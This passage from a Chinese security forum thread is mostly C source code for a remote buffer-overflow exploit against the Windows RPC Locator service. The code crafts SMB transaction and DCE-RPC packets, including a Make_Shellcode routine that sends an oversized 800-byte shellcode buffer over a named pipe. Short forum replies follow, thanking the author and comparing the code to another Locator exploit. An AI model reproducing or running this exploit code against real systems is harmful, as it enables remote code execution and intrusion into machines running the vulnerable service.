0x0; RpcBind->Numelements = 0x1; RpcBind->Contextid = 0x0; RpcBind->Numsyntaxes = 0x1; UuidFromString((unsigned char *)"12345778-1234-ABCD-EF00-0123456789AB", &RpcBind->Abstract); RpcBind->AbstractVer = 0x4; UuidFromString((unsigned char *)"8A885D04-1CEB-11C9-9FE8-08002B104860", &RpcBind->Transfer); RpcBind->TransferVer = 0x2; memcpy(szBytes, SmbHeader, dwSize1); memcpy(szBytes + dwSize1, SmbTransaction, dwSize2); memcpy(szBytes + dwSize1 + dwSize2, SmbTrandata, dwSize5); memcpy(szBytes + dwSize1 + dwSize2 + dwSize5, szFileName, sizeof(szFileName)); memcpy(szBytes + dwSize1 + dwSize2 + dwSize5 + sizeof(szFileName), RpcHeader, dwSize3); memcpy(szBytes + dwSize1 + dwSize2 + dwSize3 + dwSize5 + sizeof(szFileName), RpcBind, dwSize4); i = send(csock, (char *)szBytes, dwSize, 0); if(i<0) { xfree(szBytes); xfree(SmbHeader); xfree(SmbTransaction); xfree(SmbTrandata); xfree(RpcHeader); xfree(RpcBind); return 1; } memset(SmbHeader, 0, dwSize1); szBytes1 = new char[512]; if(!szBytes1) { xfree(szBytes); xfree(SmbHeader); xfree(SmbTransaction); xfree(SmbTrandata); xfree(RpcHeader); xfree(RpcBind); return 1; } i = recv(csock, szBytes1, 512, 0); if(i <= 0) { xfree(szBytes); xfree(SmbHeader); xfree(SmbTransaction); xfree(SmbTrandata); xfree(RpcHeader); xfree(RpcBind); delete [] szBytes1; return 1; } tmp = (char *)SmbHeader; SmbHeader = (SMB_HEADER *)szBytes1; if(SmbHeader->Status != 0) { SmbHeader = (SMB_HEADER *)tmp; xfree(szBytes); xfree(SmbHeader); xfree(SmbTransaction); xfree(SmbTrandata); xfree(RpcHeader); xfree(RpcBind); delete [] szBytes1; return 1; } SmbHeader = (SMB_HEADER *)tmp; xfree(szBytes); xfree(SmbHeader); xfree(SmbTransaction); xfree(SmbTrandata); xfree(RpcHeader); xfree(RpcBind); delete [] szBytes1; return 0; } // RPC查询,引发错误 // 输入: // SOCKET csock // 输出: // 返回: // 成功 =0 // 错误 !=0 int Make_Shellcode(SOCKET csock) { PSMB_HEADER SmbHeader; PSMB_TRANSACTION SmbTransaction; PRPC_HEADER RpcHeader; PRPC_REQUEST RpcRequest; PSMB_TRANDATA SmbTrandata; PCHAR szBytes; USHORT dwSize, dwSize1, dwSize2, dwSize3, dwSize4, dwSize5; char szFileName[] = "\0\\\0P\0I\0P\0E\0\\\0\0"; int i; for(i=0; i<800; i++)szShellcode[i] = 0x41; memcpy(szShellcode, szShellhead, 12); dwSize1 = sizeof(SMB_HEADER); dwSize2 = sizeof(SMB_TRANSACTION); dwSize3 = sizeof(RPC_HEADER); dwSize4 = sizeof(RPC_REQUEST); dwSize5 = sizeof(SMB_TRANDATA); dwSize = dwSize1 + dwSize2 + sizeof(szFileName) + dwSize3 + dwSize4 + dwSize5 + sizeof(szShellcode); SmbHeader = (SMB_HEADER *)xmalloc(dwSize1); SmbTransaction = (SMB_TRANSACTION *)xmalloc(dwSize2); RpcHeader = (RPC_HEADER *)xmalloc(dwSize3); RpcRequest = (RPC_REQUEST *)xmalloc(dwSize4); SmbTrandata = (SMB_TRANDATA *)xmalloc(dwSize5); szBytes = xmalloc(dwSize); if(!SmbHeader || !SmbTransaction || !SmbTrandata || !szBytes || !RpcHeader || !RpcRequest) return 1; SmbHeader->NBTHeader.s.packetFlags = 0; SmbHeader->NBTHeader.s.packetType = 0; SmbHeader->NBTHeader.s.packetLen = htons(dwSize - 4); SmbHeader->Protocol = SMBMAGICVAL; SmbHeader->Command = SMB_COM_TRANSACTION; SmbHeader->Status = 0; SmbHeader->Pid = Proc_ID; SmbHeader->Uid = User_ID; SmbHeader->Tid = Tree_ID; SmbHeader->Mid = Mult_ID; SmbHeader->Flags = 8; SmbHeader->Flags2 = 49153; SmbTransaction->WordCount = 16; SmbTransaction->TotalDataCount = 800; SmbTransaction->MaxDataCount = 800; SmbTransaction->ParameterOffset = dwSize1 + dwSize2 + dwSize5 + sizeof(szFileName) - 4; SmbTransaction->DataCount = 800; SmbTransaction->DataOffset = dwSize1 + dwSize2 + dwSize5 + sizeof(szFileName) - 4; SmbTransaction->SetupCount = 0x2; SmbTrandata->PipeFunc = 0x26; SmbTrandata->FileID = File_ID; SmbTrandata->ByteCount = dwSize3 + dwSize4 + sizeof(szFileName) + sizeof(szShellcode); RpcHeader->VersionMaj = 0x5; RpcHeader->VerisonMin = 0; RpcHeader->Type = 0x0; if(iNumber == 0) RpcHeader->Flags = 0x1; else RpcHeader->Flags = 0x0; RpcHeader->Rep = 0x10; RpcHeader->Fraglength = 800; RpcHeader->Authlen = 0x0; RpcHeader->Callid = 0x8D; RpcRequest->Hint = 0xA7C8 - iNumber*800; RpcRequest->Contextid = 0x0; RpcRequest->Opera = 0x0; memcpy(szBytes, SmbHeader, dwSize1); memcpy(szBytes + dwSize1, SmbTransaction, dwSize2); memcpy(szBytes + dwSize1 + dwSize2, SmbTrandata, dwSize5); memcpy(szBytes + dwSize1 + dwSize2 + dwSize5, szFileName, sizeof(szFileName)); memcpy(szBytes + dwSize1 + dwSize2 + dwSize5 + sizeof(szFileName), RpcHeader, dwSize3); memcpy(szBytes + dwSize1 + dwSize2 + dwSize3 + dwSize5 + sizeof(szFileName), RpcRequest, dwSize4); memcpy(szBytes + dwSize1 + dwSize2 + dwSize3 + dwSize4 + dwSize5 + sizeof(szFileName), szShellcode, sizeof(szShellcode)); i = send(csock, (char *)szBytes, dwSize, 0); if(i<0) { xfree(szBytes); xfree(SmbHeader); xfree(SmbTransaction); xfree(SmbTrandata); xfree(RpcHeader); xfree(RpcRequest); return 1; } xfree(szBytes); xfree(SmbHeader); xfree(SmbTransaction); xfree(SmbTrandata); xfree(RpcHeader); xfree(RpcRequest); return 0; } 参考: Platform SDK Documentation http://www.immunitysec.com/downloads/plonk (Linux binary file) 关于我们: WSS(Whitecell Security Systems),一个非营利性民间技术组织,致力于各种系统安全技术的研究。坚持传统的hacker精神,追求技术的精纯。 WSS 主页:http://www.whitecell.org/ |
| B6层 发表时间: 05/17 00:16 |
| 回复: jnake [jnake] 论坛用户 |
登录 |
|
多写了softlib兄。紧记教导。 |
| B7层 发表时间: 05/18 19:10 |
| 回复: fora [fora] 论坛用户 |
登录 |
|
sunx也写过一个RPC locator exploit “2003-04-07 真正远程的 Rpc Locator 溢出 以后别迷信老外水平一定很高, 其实Locator 溢出根本不需要UNICODE 的shellcode” 跟上面的是一样的吗? |
| B8层 发表时间: 05/19 11:28 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 原创软件
标题: 开发SMB扫描器,需要大家技术上支持!